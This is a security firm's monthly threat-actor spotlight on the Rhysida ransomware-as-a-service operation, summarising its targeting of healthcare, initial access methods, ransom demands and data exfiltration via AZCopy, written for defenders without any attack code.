MOXFIVE Threat Actor Spotlight - Rhysida

Every month, we take a look at a current ransomware threat actor. If you would like to receive this via email each month, click below to subscribe to the MOXFIVE mailing list.

Subscribe

Rhysida

Rhysida, a ransomware-as-a-service (RaaS) operation that emerged in 2023, has rapidly gained traction among threat actors. Rhysida provides use of their ransomware and dark web infrastructure, including data leak site and negotiations channels, to a variety of threat actors in exchange for a percentage of the ransom. This may result in more variance between different attacks than a type of ransomware that is leveraged by a single threat actor group. Rhysida has become one of the most actively used ransomware services, particularly during Q3 2024.

Threat actors deploying this ransomware primarily target the Healthcare sector but has been seen impacting a wide range of industries. In most cases, initial access has been gained through phishing emails, unpatched vulnerabilities, and external-facing remote services like Zerologon (CVE-2020-1472). Additionally, infections have been linked to users downloading and installing malicious Teams executables, leading to widespread incidents across various organizations.

Key Highlights:

June 2024 Targeted Industries: Threat actors deploying Rhysida have primarily targeted the Healthcare industry throughout the year, and this trend remained consistent throughout July. However, other industries have been commonly impacted and remain at risk of this threat.

Ransomware Payment Demands: MOXFIVE has observed Rhysida payment demands reaching as high as $2 million. In some cases, ransom negotiations have been successful, with reductions of up to 50% from the initial demand. These outcomes were often achieved by emphasizing the size of the impacted business and the perceived value of the exfiltrated data.

Notable Leveraged Exploits:

Data Exfiltration: Threat actors deploying Rhysida use a double extortion strategy, where they exfiltrate sensitive data and leverage a public leak site with a countdown time to pressure victims into paying. In some cases, threat actors utilized AZCopy, a command-line tool created by Microsoft, to exfiltrate large volumes of data from compromised networks to Azure Blob Storage.